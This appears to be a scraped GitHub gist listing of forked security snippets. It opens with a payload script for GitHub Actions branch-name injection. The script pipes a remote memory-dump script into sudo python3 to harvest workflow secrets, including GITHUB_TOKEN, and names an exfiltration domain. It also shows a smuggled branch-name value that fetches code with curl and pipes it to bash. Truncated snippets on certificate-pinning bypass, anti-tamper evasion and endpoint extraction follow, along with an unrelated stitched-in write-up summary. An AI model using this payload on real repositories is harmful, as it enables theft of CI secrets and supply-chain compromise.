@AkshayJainG
AkshayJainG / payload.sh
Created December 1, 2023 06:34 — forked from AdnaneKhan/payload.sh
Universal "dump all secrets" payload for GitHub workflow branch name injection.
# Replace with Burp collaborator domain or similar.
YOUR_EXFIL="https://your-exfil-domain.com"
# Deliver via branch name: 'Hacked”;{curl,-sSfL,gist.githubusercontent.com/YourUser/Hash/raw/payload.sh}${IFS}|${IFS}bash'
# Uses memory dump technique from github.com/nikitastupin/pwnhub / with regex to parse out all secret values (including GITHUB_TOKEN)
if [[ "$OSTYPE" == "linux-gnu" ]]; then
B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0 | base64 -w 0`
# Print to run log
echo $B64_BLOB

TL;DR

  • I found 1 browser, 1 language, and 15 vulnerabilities in { Web Framework, HTTP Client library, Email library / Web Service, etc }
  • All the vulnerabilities I found were found from a single perspective (I investigated maybe 50-80 products).
  • The RFC description of the problem (rather confusingly) describes the requirements for this problem, while the WHATWG HTML Spec is well documented.
  • The problem is clearly targeted at the Content-Disposition fields filename and filename*.
  • This problem affects HTTP Request/Response/Email in different ways.
    • HTTP Request : request tampering (especially with file contents, tainting of other fields, etc.)
    • HTTP Response : Reflected File Download vulnerability
    • Email : Attachment tampering (e.g., extension and filename tampering and potential file content tampering)
@AkshayJainG
AkshayJainG / gist:2971fb673aa707464beca6ddf20fbaa9
Created August 1, 2023 14:01 — forked from sdcampbell/gist:35398cb2e0263a11ba6c329c3b1d8e05
Paste this into your browser developer console to print all URL paths found in all JavaScript loaded by the page.
javascript:(function(){
  var scripts = document.getElementsByTagName("script"),
      regex = /(?<=(\"|\%27|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\%60))/g;
  const results = new Set;
  for (var i = 0; i < scripts.length; i++) {
    var t = scripts[i].src;
    "" != t && fetch(t).then(function(t) { return t.text(); })
      .then(function(t) { var e = t.matchAll(regex); for (let r of e) results.add(r[0]); })
      .catch(function(t) { console.log("An error occurred: ", t); });
  }
  var pageContent = document.documentElement.outerHTML,
      matches = pageContent.matchAll(regex);
  for (const match of matches) results.add(match[0]);
  function writeResults() { results.forEach(function(t) { document.write(t + "<br>"); }); }
  setTimeout(writeResults, 3e3);
})();
@AkshayJainG
AkshayJainG / android12burp.md
Created September 25, 2022 15:57 — forked from TobiasS1402/android12burp.md
Android 12 BurpSuite intercepting

generating certificate

My Android 12 device does not accept the default Burp certificate; you have to generate a unique certificate, import it into Burp, and use the commands below to make it compatible with Android.

mkdir cert && cd cert
openssl req -x509 -days 730 -nodes -newkey rsa:2048 -outform der -keyout server.key -out ca.der -extensions v3_ca #generate ca
openssl rsa -in server.key -inform pem -out server.key.der -outform der #convert
openssl pkcs8 -topk8 -in server.key.der -inform der -out server.key.pkcs8.der -outform der -nocrypt #convert to pkcs8

openssl x509 -inform der -in ca.der -out ca.pem
cp ca.pem `openssl x509 -inform pem -subject_hash_old -in ca.pem | head -1`.0 #create a filename with the hash
@AkshayJainG
AkshayJainG / ios14-certificate-pinning-bypass.md
Created September 25, 2022 15:57 — forked from AkdM/ios14-certificate-pinning-bypass.md
iOS 14 app TLS decrypt / certificate pinning bypass steps

This is not a tutorial, just a small guide for myself, but feel free to take some info from here.

Working on an iPhone 7 running iOS 14.5.1

  1. Jailbreak an iPhone/iPad/whatever

  2. If necessary, you'll need to bypass Jailbreak detection for some apps with tweaks like A-Bypass, Hestia, HideJB, etc.

  3. Get the PID of the app you want to capture traffic from with frida-ps -Ua (-a shows only running apps; use -U on its own to show all running processes instead)

@AkshayJainG
AkshayJainG / DOCKER-IN-AN-HOUR.md
Created March 27, 2022 19:15 — forked from leonjza/DOCKER-IN-AN-HOUR.md
Docker in an hour Workshop

docker-in-an-hour

@leonjza

Welcome to docker-in-an-hour! This is a "JIT" for docker, with many explanations being just enough to defend yourself. It is highly recommended that you go and at least Google some of the stuff here after doing the workshop. Read the official docs with real explanations.

toc

@AkshayJainG
AkshayJainG / bypassAntiTamper.js
Created March 21, 2022 11:29 — forked from rodnt/bypassAntiTamper.js
Simple bypass of iOS anti-tamper checks: ptrace, sysctl, strstr, getppid
/**
* Rodolfo 'rodnt' Tavares
* twitter @rodntt
* github rodnt
*/
if(ObjC.available) {
const tamperLibs = [
"Substrate",
@AkshayJainG
AkshayJainG / enc_str.cc
Created October 17, 2021 16:22 — forked from yujincheng08/enc_str.cc
Compile time encrypt string
#include "enc_str.h"
#include <cstdio>
static_assert(next_prime<next_prime<4>> == next_prime<4> && next_prime<4> == 5, "??");
static constexpr auto j = "I love vvb2060 and she's my wife."_senc;
static constexpr auto k = ".."_senc;
static constexpr auto l = j + k;
int main() {
@AkshayJainG
AkshayJainG / README.md
Created July 13, 2021 09:13 — forked from coaxial/README.md
unpinning SSL certs on Android apps with Frida to inspect network traffic with mitmproxy

Most of the time, applications won't pin the certificate. Running mitmproxy and passing all Android traffic through it is as simple as adb connect <IP> && adb shell settings put global http_proxy <mitmproxy host>:<mitmproxy port> (or use Android's UI)

Some applications, however, pin the certificate and will refuse to do any network calls if using mitmproxy.

Luckily, Frida is here!

This assumes Android x86 is running in a VM, that developer options are enabled on Android (tap the build version enough times), that adb debugging is enabled, and that the Android tools are installed on the host.

  • start mitmproxy on host
  • visit mitm.it on the target (after setting the proxy) and install the spoofed cert
@AkshayJainG
AkshayJainG / macho.js
Created April 25, 2021 15:56 — forked from ChiChou/macho.js
Frida in-memory Mach-O parser
// to speed up, I removed all data validation
function MemoryBuffer(address, size) {
this.base = address
if (!size) {
// const range = Process.findRangeByAddress(address)
// if (!range)
// throw new Error('invalid address: ' + address)